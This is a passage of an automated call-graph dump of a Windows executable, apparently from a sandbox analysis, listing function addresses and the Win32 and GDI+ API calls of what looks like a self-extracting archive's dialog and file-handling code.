24687->24678 24713 13b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24689->24713 24691 13b5cd 24693 13b5d9 24691->24693 24714 13b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24691->24714 24693->24558 24693->24559 24693->24560 24695 13b6e5 SizeofResource 24694->24695 24696 13b7d3 24694->24696 24695->24696 24697 13b6fc LoadResource 24695->24697 24696->24551 24696->24553 24697->24696 24698 13b711 LockResource 24697->24698 24698->24696 24699 13b722 GlobalAlloc 24698->24699 24699->24696 24700 13b73d GlobalLock 24699->24700 24701 13b7cc GlobalFree 24700->24701 24702 13b74c __InternalCxxFrameHandler 24700->24702 24701->24696 24703 13b754 CreateStreamOnHGlobal 24702->24703 24704 13b7c5 GlobalUnlock 24703->24704 24705 13b76c 24703->24705 24704->24701 24715 13b626 GdipAlloc 24705->24715 24708 13b7b0 24708->24704 24709 13b79a GdipCreateHBITMAPFromBitmap 24709->24708 24710->24563 24711->24566 24712->24568 24713->24691 24714->24693 24716 13b645 24715->24716 24717 13b638 24715->24717 24716->24704 24716->24708 24716->24709 24719 13b3b8 24717->24719 24720 13b3e0 GdipCreateBitmapFromStream 24719->24720 24721 13b3d9 GdipCreateBitmapFromStreamICM 24719->24721 24722 13b3e5 24720->24722 24721->24722 24722->24716 24724 12ed95 __EH_prolog 24723->24724 24725 12edc4 GetModuleFileNameW 24724->24725 24726 12edf5 24724->24726 24727 12edde 24725->24727 24769 12ab40 24726->24769 24727->24726 24729 12ee51 24780 147720 24729->24780 24731 12f581 79 API calls 24734 12ee25 24731->24734 24734->24729 24734->24731 24748 12f06a 24734->24748 24735 12ee64 24736 147720 26 API calls 24735->24736 24744 12ee76 ___vcrt_InitializeCriticalSectionEx 24736->24744 24737 12efa5 24737->24748 24816 12b000 82 API calls 24737->24816 24741 12efbf ___std_exception_copy 24742 12ae60 83 API calls 24741->24742 24741->24748 24745 12efe8 ___std_exception_copy 24742->24745 24744->24737 24744->24748 24794 12b110 24744->24794 24810 12ae60 24744->24810 24815 12b000 82 API calls 24744->24815 24747 12eff3 _wcslen ___std_exception_copy ___vcrt_InitializeCriticalSectionEx 24745->24747 24745->24748 24817 132ec2 MultiByteToWideChar 24745->24817 24747->24748 24749 12f479 24747->24749 24764 1330e5 WideCharToMultiByte 24747->24764 24818 12f8d1 50 API calls __vsnprintf 24747->24818 24819 147561 26 API calls 3 library calls 24747->24819 24820 14a08e 26 API calls ___std_exception_copy 24747->24820 24821 148a08 26 API calls ___std_exception_copy 24747->24821 24822 12f59c 79 API calls 24747->24822 24803 12a801 24748->24803 24759 12f4fe 24749->24759 24823 14a08e 26 API calls ___std_exception_copy 24749->24823 24753 12f4e6 24825 12f59c 79 API calls 24753->24825 24754 12f534 24757 147720 26 API calls 24754->24757 24756 12f581 79 API calls 24756->24759 24758 12f54d 24757->24758 24761 147720 26 API calls 24758->24761 24759->24754 24759->24756 24760 12f48e 24824 148a08 26 API calls ___std_exception_copy 24760->24824 24761->24748 24764->24747 24767 12f5be GetModuleHandleW FindResourceW 24768 12ed75 24767->24768 24768->24574 24770 12ab4a 24769->24770 24771 12abab CreateFileW 24770->24771 24772 12ac1b 24771->24772 24773 12abcc GetLastError 24771->24773 24777 12ac5f 24772->24777 24779 12ac45 SetFileTime 24772->24779 24826 12cf32 24773->24826 24775 12abec 24775->24772 24776 12abf0 CreateFileW GetLastError 24775->24776 24776->24772 24778 12ac15 24776->24778 24777->24734 24778->24772 24779->24777 24781 147759 24780->24781 24782 14775d 24781->24782 24793 147785 24781->24793 24830 14a7db 20 API calls _free 24782->24830 24784 147aa9 24786 140d6c CatchGuardHandler 5 API calls 24784->24786 24785 147762 24831 1451a9 26 API calls ___std_exception_copy 24785->24831 24788 147ab6 24786->24788 24788->24735 24789 14776d 24790 140d6c CatchGuardHandler 5 API calls 24789->24790 24792 147779 24790->24792 24792->24735 24793->24784 24832 147640 5 API calls CatchGuardHandler 24793->24832 24795 12b122 24794->24795 24800 12b135 24794->24800 24796 12b140 24795->24796 24833 127800 78 API calls 24795->24833 24796->24744 24797 12b148 SetFilePointer 24797->24796 24799 12b164 GetLastError 24797->24799 24799->24796 24801 12b16e 24799->24801 24800->24796 24800->24797 24801->24796 24834 127800 78 API calls 24801->24834 24804 12a825 24803->24804 24805 12a836 24803->24805 24804->24805 24806 12a831 24804->24806 24807 12a838 24804->24807 24805->24767 24835 12a9ae 24806->24835 24840 12a880 24807->24840 24811 12ae6c 24810->24811 24812 12ae73 24810->24812 24811->24744 24812->24811 24814 12a9e5 GetStdHandle ReadFile GetLastError GetLastError GetFileType 24812->24814 24855 1277bd 78 API calls 24812->24855 24814->24812 24815->24744 24816->24741 24817->24747 24818->24747 24819->24747 24820->24747 24821->24747 24822->24747 24823->24760 24824->24753 24825->24759 24827 12cf3f _wcslen 24826->24827 24828 12cfe7 GetCurrentDirectoryW 24827->24828 24829 12cf68 _wcslen 24827->24829 24828->24829 24829->24775 24830->24785 24831->24789 24832->24793 24833->24800 24834->24796 24836 12a9e1 24835->24836 24837 12a9b7 24835->24837 24836->24805 24837->24836 24846 12b470 24837->24846 24841 12a8aa 24840->24841 24842 12a88c 24840->24842 24843 12a8c9 24841->24843 24854 127685 77 API calls 24841->24854 24842->24841 24844 12a898 CloseHandle 24842->24844 24843->24805 24844->24841 24847 13ffc0 24846->24847 24848 12b47d DeleteFileW 24847->24848 24849 12b490 24848->24849 24850 12a9df 24848->24850 24851 12cf32 GetCurrentDirectoryW 24849->24851 24850->24805 24852 12b4a4 24851->24852 24852->24850 24853 12b4a8 DeleteFileW 24852->24853 24853->24850 24854->24843 24855->24812 24857 149093 _abort 24856->24857 24858 1490ac 24857->24858 24859 14909a 24857->24859 24880 14bde1 EnterCriticalSection 24858->24880 24892 1491e1 GetModuleHandleW 24859->24892 24862 14909f 24862->24858 24893 149225 GetModuleHandleExW 24862->24893 24866 1490b3 24877 149128 24866->24877 24879 149151 24866->24879 24901 149ba0 20 API calls _abort 24866->24901 24868 14916e 24884 1491a0 24868->24884 24869 14919a 24902 153540 5 API calls CatchGuardHandler 24869->24902 24870 149140 24875 149e51 _abort 5 API calls 24870->24875 24874 149e51 _abort 5 API calls 24874->24870 24875->24879 24877->24870 24877->24874 24881 149191 24879->24881 24880->24866 24903 14be31 LeaveCriticalSection 24881->24903 24883 14916a 24883->24868 24883->24869 24904 14c226 24884->24904 24887 1491ce 24890 149225 _abort 8 API calls 24887->24890 24888 1491ae GetPEB 24888->24887 24889 1491be GetCurrentProcess TerminateProcess 24888->24889 24889->24887 24891 1491d6 ExitProcess 24890->24891 24892->24862 24894 149272 24893->24894 24895 14924f GetProcAddress 24893->24895 24896 149281 24894->24896 24897 149278 FreeLibrary 24894->24897 24900 149264 24895->24900 24898 140d6c CatchGuardHandler 5 API calls 24896->24898 24897->24896 24899 1490ab 24898->24899 24899->24858 24900->24894 24901->24877 24903->24883 24905 14c241 24904->24905 24906 14c24b 24904->24906 24908 140d6c CatchGuardHandler 5 API calls 24905->24908 24907 14be48 _free 5 API calls 24906->24907 24907->24905 24909 1491aa 24908->24909 24909->24887 24909->24888 24911 12b20a 24912 12b218 24911->24912 24913 12b21f 24911->24913 24914 12b22c GetStdHandle 24913->24914 24916 12b23b 24913->24916 24914->24916 24915 12b293 WriteFile 24915->24916 24916->24912 24916->24915 24917 12b264 WriteFile 24916->24917 24918 12b25f 24916->24918 24920 12b325 24916->24920 24922 12765a 79 API calls 24916->24922 24917->24916 24917->24918 24918->24916 24918->24917 24923 127951 78 API calls 24920->24923 24922->24916 24923->24912 26121 122430 26 API calls std::bad_exception::bad_exception 24927 13a530 24928 13a555 24927->24928 24929 13a53b 24927->24929 24929->24928 24931 13b181 24929->24931 24932 13b198 24931->24932 24933 13b18a 24931->24933 24932->24928 24933->24932 24935 13a6c1 24933->24935 24936 13a6d0 _wcslen ___std_exception_copy 24935->24936 24945 13a7f6 24935->24945 24936->24945 24946 133328 CompareStringW _wcslen 24936->24946 24938 13a749 _wcslen 24939 13a78b GlobalAlloc 24938->24939 24940 13a7a1 WideCharToMultiByte 24939->24940 24941 13a7c0 24939->24941 24940->24941 24942 13a7d4 CreateStreamOnHGlobal 24941->24942 24943 13a7e8 24942->24943 24942->24945 24947 13a59b 24943->24947 24945->24932 24946->24938 24949 13a5c4 24947->24949 24948 13a6b0 24948->24945 24949->24948 24955 13ad0e CompareStringW _wcslen ___std_exception_copy 24949->24955 24951 13a67a 24951->24948 24952 13a680 ShowWindow SetWindowTextW 24951->24952 24954 13a6af 24952->24954 24954->24948 24955->24951 26194 140737 29 API calls _abort 26148 140530 46 API calls __RTC_Initialize 26122 122037 143 API calls __EH_prolog 26149 130534 FreeLibrary 24981 12213d 24982 122150 24981->24982 24983 122148 24981->24983 24985 13feae 27 API calls 24982->24985 24986 12214e 24982->24986 24987 122162 27 API calls Concurrency::cancel_current_task 24983->24987 24985->24986 24987->24986 26195 149320 52 API calls 2 library calls 26123 121025 29 API calls 26196 140723 20 API calls 24998 12ca2e 24999 12ca40 __cftof 24998->24999 25002 1323f4 24999->25002 25005 1323b6 GetCurrentProcess GetProcessAffinityMask 25002->25005 25006 12ca97 25005->25006 26125 12a850 81 API calls Concurrency::cancel_current_task 26151 126950 41 API calls __EH_prolog 26178 13fe51 48 API calls _unexpected 26126 13c450 101 API calls 26127 13a450 IsWindow 26179 14b650 71 API calls _free 26180 151a50 IsProcessorFeaturePresent 26129 13b440 GdipCloneImage GdipAlloc 26198 13e740 71 API calls 26152 141540 51 API calls 2 library calls 25958 13fd48 25959 13fd52 25958->25959 25960 13f9d9 ___delayLoadHelper2@8 14 API calls 25959->25960 25961 13fd5f 25960->25961 26154 122570 97 API calls 26131 138870 133 API calls 26155 141170 RaiseException std::_Xinvalid_argument _com_error::_com_error 25972 121075 25973 1304e5 41 API calls 25972->25973 25974 12107a 25973->25974 25977 140362 29 API calls 25974->25977 25976 121084 25977->25976 26183 143e7b 38 API calls 4 library calls 26200 14c368 27 API calls 2 library calls 26134 13a490 GetClientRect CopyRect 26135 14d090 GetCommandLineA GetCommandLineW 24153 13f595 24155 13f53e 24153->24155 24156 13f9d9 24155->24156 24182 13f737 24156->24182 24158 13f9e9 24159 13fa46 24158->24159 24171 13fa6a 24158->24171 24160 13f977 DloadReleaseSectionWriteAccess 6 API calls 24159->24160 24161 13fa51 RaiseException 24160->24161 24163 13fc3f 24161->24163 24162 13fb55 24170 13fbb3 GetProcAddress 24162->24170 24176 13fc11 24162->24176 24163->24155 24164 13fae2 LoadLibraryExA 24165 13fb43 24164->24165 24166 13faf5 GetLastError 24164->24166 24165->24162 24167 13fb4e FreeLibrary 24165->24167 24168 13fb08 24166->24168 24169 13fb1e 24166->24169 24167->24162 24168->24165 24168->24169 24173 13f977 DloadReleaseSectionWriteAccess 6 API calls 24169->24173 24172 13fbc3 GetLastError 24170->24172 24170->24176 24171->24162 24171->24164 24171->24165 24171->24176 24180 13fbd6 24172->24180 24175 13fb29 RaiseException 24173->24175 24175->24163 24191 13f977 24176->24191 24177 13f977 DloadReleaseSectionWriteAccess 6 API calls 24178 13fbf7 RaiseException 24177->24178 24179 13f737 ___delayLoadHelper2@8 6 API calls 24178->24179 24181 13fc0e 24179->24181 24180->24176 24180->24177 24181->24176 24183 13f743 24182->24183 24184 13f769 24182->24184 24199 13f7e0 24183->24199 24184->24158 24186 13f748 24187 13f764 24186->24187 24202 13f909 24186->24202 24207 13f76a GetModuleHandleW GetProcAddress GetProcAddress 24187->24207 24190 13f9b2 24190->24158 24192 13f9ab 24191->24192 24193 13f989 24191->24193 24192->24163 24194 13f7e0 DloadReleaseSectionWriteAccess 3 API calls 24193->24194 24195 13f98e 24194->24195 24196 13f9a6 24195->24196 24198 13f909 DloadProtectSection 3 API calls 24195->24198 24210 13f9ad GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 24196->24210 24198->24196 24208 13f76a GetModuleHandleW GetProcAddress GetProcAddress 24199->24208 24201 13f7e5 24201->24186 24203 13f91e DloadProtectSection 24202->24203 24204 13f924 24203->24204 24205 13f959 VirtualProtect 24203->24205 24209 13f81f VirtualQuery GetSystemInfo 24203->24209 24204->24187 24205->24204 24207->24190 24208->24201 24209->24205 24210->24192 26136 121095 44 API calls 26159 13f59f 14 API calls ___delayLoadHelper2@8 26160 13d8c6 109 API calls 4 library calls 24217 13b080 24218 13b0a9 NtdllDefWindowProc_W 24217->24218 24219 13b08f SetWindowLongW 24217->24219 24222 13a812 24219->24222 24221 13b0a8 24221->24218 24227 13feae 24222->24227 24224 13a829 24226 13a859 24224->24226 24240 13b0be CLSIDFromString CoCreateInstance 24224->24240 24226->24221 24228 13feb3 ___std_exception_copy 24227->24228 24229 13fecd 24228->24229 24231 13fecf 24228->24231 24244 148e4c 7 API calls 2 library calls 24228->24244 24229->24224 24232 1248f5 Concurrency::cancel_current_task 24231->24232 24234 13fed9 24231->24234 24242 143330 RaiseException 24232->24242 24245 143330 RaiseException 24234->24245 24235 124911 24237 124927 24235->24237 24243 12136b 26 API calls Concurrency::cancel_current_task 24235->24243 24237->24224 24238 140810 24241 13b0f6 24240->24241 24241->24226 24242->24235 24243->24237 24244->24228 24245->24238 26162 14b580 21 API calls _free 26184 143a80 6 API calls 4 library calls 26202 140780 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 26185 13d8c6 112 API calls 4 library calls 26138 14b8b0 21 API calls 26139 149cb0 7 API calls ___scrt_uninitialize_crt 26163 153db0 VariantClear 26203 1503b0 51 API calls 24957 1210b5 24962 12644d 24957->24962 24961 1210c4 24963 126457 __EH_prolog 24962->24963 24971 12c9d8 GetCurrentProcess GetProcessAffinityMask 24963->24971 24965 126464 24972 1304e5 24965->24972 24967 1264bb 24976 12665c GetCurrentProcess GetProcessAffinityMask 24967->24976 24969 1210ba 24970 140362 29 API calls 24969->24970 24970->24961 24971->24965 24973 1304ef __EH_prolog 24972->24973 24977 124846 41 API calls 24973->24977 24975 13050b 24975->24967 24976->24969 24977->24975 26204 13d8c6 103 API calls 4 library calls 26165 13d8c6 98 API calls 4 library calls 26205 13c7a0 110 API calls 24989 14bda0 24990 14bdab 24989->24990 24991 14c0ba 11 API calls 24990->24991 24992 14bdd4 24990->24992 24993 14bdd0 24990->24993 24991->24990 24995 14be00 DeleteCriticalSection 24992->24995 24995->24993 26207 140eff 9 API calls 2 library calls 26166 13bdd0 74 API calls 26167 1505d1 21 API calls __vsnwprintf_l 26208 1473d0 QueryPerformanceFrequency QueryPerformanceCounter 25014 12acd4 25015 12acde 25014->25015 25016 12ae2c SetFilePointer 25015->25016 25019 12acf4 25015->25019 25020 12ae05 25015->25020 25021 12aa7a 25015->25021 25017 12ae49 GetLastError 25016->25017 25016->25019 25017->25019 25020->25016 25022 12aa93 25021->25022 25024 12b110 80 API calls 25022->25024 25023 12aac5 25023->25020 25024->25023 25029 13c9c0 25030 13c9ca __EH_prolog 25029->25030 25195 1212f6 25030->25195 25033 13d0fb 25272 13e7de 25033->25272 25034 13ca0a 25036 13ca7b 25034->25036 25037 13ca18 25034->25037 25111 13ca21 25034->25111 25043 13cb0e GetDlgItemTextW 25036->25043 25047 13ca91 25036->25047 25039 13ca58 25037->25039 25040 13ca1c 25037->25040 25050 13cb3f KiUserCallbackDispatcher 25039->25050 25039->25111 25049 12f937 53 API calls 25040->25049 25040->25111 25041 13d116 SendMessageW 25042 13d124 25041->25042 25045 13d13e GetDlgItem SendMessageW 25042->25045 25046 13d12d SendDlgItemMessageW 25042->25046 25043->25039 25044 13cb4b 25043->25044 25051 13cb60 GetDlgItem 25044->25051 25193 13cb54 25044->25193 25290 13b64d GetCurrentDirectoryW 25045->25290 25046->25045 25048 12f937 53 API calls 25047->25048 25056 13caae SetDlgItemTextW 25048->25056 25057 13ca3b 25049->25057 25050->25111 25053 13cb97 SetFocus 25051->25053 25054 13cb74 SendMessageW SendMessageW 25051->25054 25060 13cba7 25053->25060 25073 13cbb3 25053->25073 25054->25053 25055 13d16e GetDlgItem 25058 13d191 SetWindowTextW 25055->25058 25059 13d18b 25055->25059 25061 13cab9 25056->25061 25310 12122f SHGetMalloc 25057->25310 25291 13bbb0 GetClassNameW 25058->25291 25059->25058 25065 12f937 53 API calls 25060->25065 25067 13cac6 GetMessageW 25061->25067 25061->25111 25063 13d041 25066 12f937 53 API calls 25063->25066 25069 13cbb1 25065->25069 25070 13d051 SetDlgItemTextW 25066->25070 25071 13cadd IsDialogMessageW 25067->25071 25067->25111 25206 13e607 25069->25206 25075 13d065 25070->25075 25071->25061 25076 13caec TranslateMessage DispatchMessageW 25071->25076 25080 12f937 53 API calls 25073->25080 25074 13d3e8 SetDlgItemTextW 25074->25111 25081 12f937 53 API calls 25075->25081 25076->25061 25079 13cc0d 25084 13cc41 25079->25084 25311 12b4c1 25079->25311 25083 13cbea 25080->25083 25119 13d088 _wcslen 25081->25119 25082 13d1dc 25086 13d20c 25082->25086 25090 12f937 53 API calls 25082->25090 25087 124a20 _swprintf 51 API calls 25083->25087 25217 12b341 25084->25217 25085 13d872 98 API calls 25085->25082 25091 13d872 98 API calls 25086->25091 25131 13d2c4 25086->25131 25087->25069 25095 13d1ef SetDlgItemTextW 25090->25095 25096 13d227 25091->25096 25093 13d374 25098 13d380 EnableWindow 25093->25098 25099 13d389 25093->25099 25103 12f937 53 API calls 25095->25103 25122 13d252 25096->25122 25321 13aee5 ShowWindow 25096->25321 25097 13cc3b 25314 13beef CreateDirectoryW LocalFree GetCurrentProcess GetLastError 25097->25314 25098->25099 25108 13d3a6 25099->25108 25340 1212b3 GetDlgItem EnableWindow 25099->25340 25100 13d0d9 25106 12f937 53 API calls 25100->25106 25101 13cc5a GetLastError 25102 13cc65 25101->25102 25223 13bc09 SetCurrentDirectoryW 25102->25223 25105 13d203 SetDlgItemTextW 25103->25105 25105->25086 25106->25111 25110 13d3cd 25108->25110 25120 13d3c5 SendMessageW 25108->25120 25109 13cc79 25114 13cc90 25109->25114 25115 13cc82 GetLastError 25109->25115 25110->25111 25121 12f937 53 API calls 25110->25121 25112 13d2b7 25116 13d872 98 API calls 25112->25116 25127 13cd16 25114->25127 25129 13cca0 GetTickCount 25114->25129 25168 13cd07 25114->25168 25115->25114 25116->25131 25118 13d39c 25341 1212b3 GetDlgItem EnableWindow 25118->25341 25119->25100 25124 12f937 53 API calls 25119->25124 25120->25110 25130 13ca42 25121->25130 25122->25112 25142 13d872 98 API calls 25122->25142 25125 13d0bc 25124->25125 25132 124a20 _swprintf 51 API calls 25125->25132 25126 13cf42 25232 1212d1 GetDlgItem ShowWindow 25126->25232 25133 13cee7 25127->25133 25134 13cd2f GetModuleFileNameW 25127->25134 25135 13cedd 25127->25135 25128 13d355 25137 13aee5 40 API calls 25128->25137 25138 124a20 _swprintf 51 API calls 25129->25138 25130->25074 25130->25111 25131->25093 25131->25128 25139 12f937 53 API calls 25131->25139 25132->25100 25141 12f937 53 API calls 25133->25141 25315 1305e6 83 API calls 25134->25315 25135->25039 25135->25133 25137->25093 25144 13ccbd 25138->25144 25139->25131 25148 13cef1 25141->25148 25145 13d28c 25142->25145 25143 13cf52 25233 1212d1 GetDlgItem ShowWindow 25143->25233 25224 12a8ce 25144->25224 25145->25112 25151 13d295 DialogBoxParamW 25145->25151 25146 13cd57 25149 124a20 _swprintf 51 API calls 25146->25149 25150 124a20 _swprintf 51 API calls 25148->25150 25153 13cd79 CreateFileMappingW 25149->25153 25156 13cf0f 25150->25156 25151->25039 25151->25112 25152 13cf5c 25154 12f937 53 API calls 25152->25154 25157 13cdd7 GetCommandLineW 25153->25157 25186 13ce4e __InternalCxxFrameHandler 25153->25186 25158 13cf66 SetDlgItemTextW 25154->25158 25166 12f937 53 API calls 25156->25166 25160 13cde8 25157->25160 25234 1212d1 GetDlgItem ShowWindow 25158->25234 25159 13cce3 25162 13ccea GetLastError 25159->25162 25163 13ccf5 25159->25163 25316 13c605 SHGetMalloc 25160->25316 25162->25163 25164 12a801 81 API calls 25163->25164 25164->25168 25169 13cf29 25166->25169 25167 13cf78 SetDlgItemTextW GetDlgItem 25170 13cf95 GetWindowLongW SetWindowLongW 25167->25170 25171 13cfad 25167->25171 25168->25126 25168->25127 25170->25171 25235 13d872 25171->25235 25172 13ce04 25317 13c605 SHGetMalloc 25172->25317 25176 13ce10 25318 13c605 SHGetMalloc 25176->25318 25177 13d872 98 API calls 25179 13cfc9 25177->25179 25260 13eb92 25179->25260 25180 13ce1c 25319 130695 83 API calls 25180->25319 25181 13ceb7 25181->25135 25188 13cecd UnmapViewOfFile CloseHandle 25181->25188 25185 13ce2d MapViewOfFile 25185->25186 25186->25181 25189 13cea3 Sleep 25186->25189 25187 13d872 98 API calls 25192 13cfef 25187->25192 25188->25135 25189->25181 25189->25186 25190 13d018 25320 1212b3 GetDlgItem EnableWindow 25190->25320 25192->25190 25194 13d872 98 API calls 25192->25194 25193->25039 25193->25063 25194->25190 25196 121358 25195->25196 25197 1212ff 25195->25197 25343 12f5e1 GetWindowLongW SetWindowLongW 25196->25343 25199 121365 25197->25199 25342 12f608 62 API calls 2 library calls 25197->25342 25199->25033 25199->25034 25199->25111 25201 121321 25201->25199 25202 121327 GetParent 25201->25202 25202->25199 25203 121334 GetDlgItem 25202->25203 25203->25199 25204 121344 25203->25204 25204->25199 25205 12134a SetWindowTextW 25204->25205 25205->25199 25344 13c748 PeekMessageW 25206->25344 25209 13e635 25349 13a235 25209->25349 25210 13e669 SendMessageW SendMessageW 25212 13e6a5 25210->25212 25213 13e6c4 SendMessageW SendMessageW SendMessageW 25210->25213 25212->25213 25215 13e6f7 SendMessageW 25213->25215 25216 13e71a SendMessageW 25213->25216 25215->25216 25216->25079 25218 12b34b 25217->25218 25219 12b405 25218->25219 25220 12b3dc 25218->25220 25352 12b542 25218->25352 25219->25101 25219->25102 25220->25219 25221 12b542 8 API calls 25220->25221 25221->25219 25223->25109 25225 12a8d8 25224->25225 25226 12a935 CreateFileW 25225->25226 25227 12a929 25225->25227 25226->25227 25228 12a97f 25227->25228 25229 12cf32 GetCurrentDirectoryW 25227->25229 25228->25159 25230 12a964 25229->25230 25230->25228 25231 12a968 CreateFileW 25230->25231 25231->25228 25232->25143 25233->25152 25234->25167 25236 13d87c __EH_prolog 25235->25236 25237 13cfbb 25236->25237 25373 13c4f4 ExpandEnvironmentStringsW 25236->25373 25237->25177 25241 13db9a SetWindowTextW 25246 13d8b3 _wcslen _wcsrchr 25241->25246 25246->25237 25246->25241 25247 13d988 SetFileAttributesW 25246->25247 25249 13d9a2 __cftof _wcslen 25246->25249 25374 133306 CompareStringW 25246->25374 25375 13b64d GetCurrentDirectoryW 25246->25375 25377 12b9ca 6 API calls 25246->25377 25378 12b953 FindClose 25246->25378 25379 13c66e 77 API calls 2 library calls 25246->25379 25380 14520e 25246->25380 25393 13c4f4 ExpandEnvironmentStringsW 25246->25393 25248 13da42 GetFileAttributesW 25247->25248 25247->25249 25248->25246 25251 13da54 DeleteFileW 25248->25251 25249->25246 25249->25248 25253 13dd64 GetDlgItem SetWindowTextW SendMessageW 25249->25253 25255 13dda4 SendMessageW 25249->25255 25376 12cdc0 51 API calls 2 library calls 25249->25376 25251->25246 25257 13da65 25251->25257 25253->25249 25254 124a20 _swprintf 51 API calls 25256 13da85 GetFileAttributesW 25254->25256 25255->25246 25256->25257 25258 13da9a MoveFileW 25256->25258 25257->25254 25258->25246 25259 13dab2 MoveFileExW 25258->25259 25259->25246 25261 13eb9c __EH_prolog 25260->25261 25405 13197c 25261->25405 25263 13ebcd 25409 1264ed 25263->25409 25265 13ebeb 25413 128823 25265->25413 25269 13ec3e 25431 12890a 25269->25431 25271 13cfda 25271->25187 25273 13e7e8 25272->25273 25274 13b5c6 4 API calls 25273->25274 25275 13e7ed 25274->25275 25276 13d101 25275->25276 25277 13e7f5 GetWindow 25275->25277 25276->25041 25276->25042 25277->25276 25283 13e815 25277->25283 25278 13e822 GetClassNameW 25929 133306 CompareStringW 25278->25929 25280 13e846 GetWindowLongW 25281 13e8aa GetWindow 25280->25281 25282 13e856 SendMessageW 25280->25282 25281->25276 25281->25283 25282->25281 25284 13e86c GetObjectW 25282->25284 25283->25276 25283->25278 25283->25280 25283->25281 25930 13b605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25284->25930 25286 13e883 25931 13b5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 25286->25931 25932 13b80c 9 API calls 25286->25932 25289 13e894 SendMessageW DeleteObject 25289->25281 25290->25055 25292 13bbd1 25291->25292 25293 13bbf6 25291->25293 25933 133306 CompareStringW 25292->25933 25297 13c207 25293->25297 25295 13bbe4 25295->25293 25296 13bbe8 FindWindowExW 25295->25296 25296->25293 25298 13c211 __EH_prolog 25297->25298 25299 1213f8 43 API calls 25298->25299 25300 13c233 25299->25300 25934 122083 25300->25934 25303 13c24d 25305 121641 87 API calls 25303->25305 25304 13c25c 25306 121a7e 143 API calls 25304->25306 25308 13c258 25305->25308 25309 13c27b __InternalCxxFrameHandler ___std_exception_copy 25306->25309 25307 121641 87 API calls 25307->25308 25308->25082 25308->25085 25309->25307 25310->25130 25942 12b4d3 25311->25942 25314->25084 25315->25146 25316->25172 25317->25176 25318->25180 25319->25185 25320->25193 25950 13ac14 LoadCursorW RegisterClassExW 25321->25950 25323 13af25 25326 13af3d GetWindowRect GetParent MapWindowPoints 25323->25326 25952 148a08 26 API calls ___std_exception_copy 25323->25952 25324 13af0f 25324->25323 25951 148a08 26 API calls ___std_exception_copy 25324->25951 25329 13af80 GetParent CreateWindowExW 25326->25329 25330 13af77 DestroyWindow 25326->25330 25331 13afcb 25329->25331 25332 13b008 25329->25332 25330->25329 25331->25332 25335 13afd0 25331->25335 25333 13b01e 25332->25333 25334 13b00c ShowWindow UpdateWindow 25332->25334 25333->25122 25334->25333 25335->25333 25953 13ad0e CompareStringW _wcslen ___std_exception_copy 25335->25953 25337 13afe8 25337->25333 25338 13afee ShowWindow SetWindowTextW 25337->25338 25339 13b005 25338->25339 25339->25333 25340->25118 25341->25108 25342->25201 25343->25199 25345 13c763 KiUserCallbackDispatcher 25344->25345 25346 13c79c GetDlgItem 25344->25346 25347 13c779 IsDialogMessageW 25345->25347 25348 13c788 TranslateMessage DispatchMessageW 25345->25348 25346->25209 25346->25210 25347->25346 25347->25348 25348->25346 25350 13a24b ShowWindow SendMessageW SendMessageW 25349->25350 25351 13a23e DestroyWindow 25349->25351 25350->25210 25351->25350 25354 12b54f 25352->25354 25353 12b573 25356 12b4c1 3 API calls 25353->25356 25354->25353 25355 12b566 CreateDirectoryW 25354->25355 25355->25353 25357 12b5a6 25355->25357 25358 12b579 25356->25358 25360 12b5b5 25357->25360 25365 12b8e6 25357->25365 25359 12b5b9 GetLastError 25358->25359 25361 12cf32 GetCurrentDirectoryW 25358->25361 25359->25360 25360->25218 25363 12b58f 25361->25363 25363->25359 25364 12b593 CreateDirectoryW 25363->25364 25364->25357 25364->25359 25366 13ffc0 25365->25366 25367 12b8f3 SetFileAttributesW 25366->25367 25368 12b936 25367->25368 25369 12b909 25367->25369 25368->25360 25370 12cf32 GetCurrentDirectoryW 25369->25370 25371 12b91d 25370->25371 25371->25368 25372 12b921 SetFileAttributesW 25371->25372 25372->25368 25373->25246 25374->25246 25375->25246 25376->25249 25377->25246 25378->25246 25379->25246 25381 14a694 25380->25381 25382 14a6a1 25381->25382 25383 14a6ac 25381->25383 25394 14a7ee 25382->25394 25384 14a6b4 25383->25384 25391 14a6bd _free 25383->25391 25386 14a65a _free 20 API calls 25384->25386 25389 14a6a9 25386->25389 25387 14a6e7 HeapReAlloc 25387->25389 25387->25391 25388 14a6c2 25401 14a7db 20 API calls _free 25388->25401 25389->25246 25391->25387 25391->25388 25402 148e4c 7 API calls 2 library calls 25391->25402 25393->25246 25395 14a82c 25394->25395 25399 14a7fc _free 25394->25399 25404 14a7db 20 API calls _free 25395->25404 25396 14a817 RtlAllocateHeap 25398 14a82a 25396->25398 25396->25399 25398->25389 25399->25395 25399->25396 25403 148e4c 7 API calls 2 library calls 25399->25403 25401->25389 25402->25391 25403->25399 25404->25398 25406 131989 _wcslen 25405->25406 25440 121895 25406->25440 25408 1319a1 25408->25263 25410 13197c _wcslen 25409->25410 25411 121895 79 API calls 25410->25411 25412 1319a1 25411->25412 25412->25265 25414 12882d __EH_prolog 25413->25414 25453 12e298 25414->25453 25416 128855 25417 13feae 27 API calls 25416->25417 25418 128899 __cftof 25417->25418 25419 13feae 27 API calls 25418->25419 25421 1288c0 25419->25421 25463 135c54 25421->25463 25423 128a38 25426 128a42 25423->25426 25424 128ab5 25425 128b1a 25424->25425 25484 1290a2 25424->25484 25429 128b5c 25425->25429 25512 121397 75 API calls 25425->25512 25426->25424 25506 12b966 25426->25506 25429->25269 25916 12a41a DeleteFileW DeleteFileW GetCurrentDirectoryW __cftof 25431->25916 25433 12892b 25435 12893c Concurrency::cancel_current_task 25433->25435 25917 133536 25433->25917 25436 122111 26 API calls 25435->25436 25437 128963 25436->25437 25438 12e339 87 API calls 25437->25438 25439 12896b 25438->25439 25439->25271 25441 1218a7 25440->25441 25448 1218ff 25440->25448 25442 1218d0 25441->25442 25450 1276e9 77 API calls __vswprintf_c_l 25441->25450 25444 14520e 22 API calls 25442->25444 25447 1218f0 25444->25447 25445 1218c6 25451 12775a 76 API calls 25445->25451 25447->25448 25452 12775a 76 API calls 25447->25452 25448->25408 25450->25445 25451->25442 25452->25448 25454 12e2a2 __EH_prolog 25453->25454 25455 13feae 27 API calls 25454->25455 25456 12e2e5 25455->25456 25457 12e2f8 25456->25457 25458 126891 41 API calls 25456->25458 25459 13feae 27 API calls 25457->25459 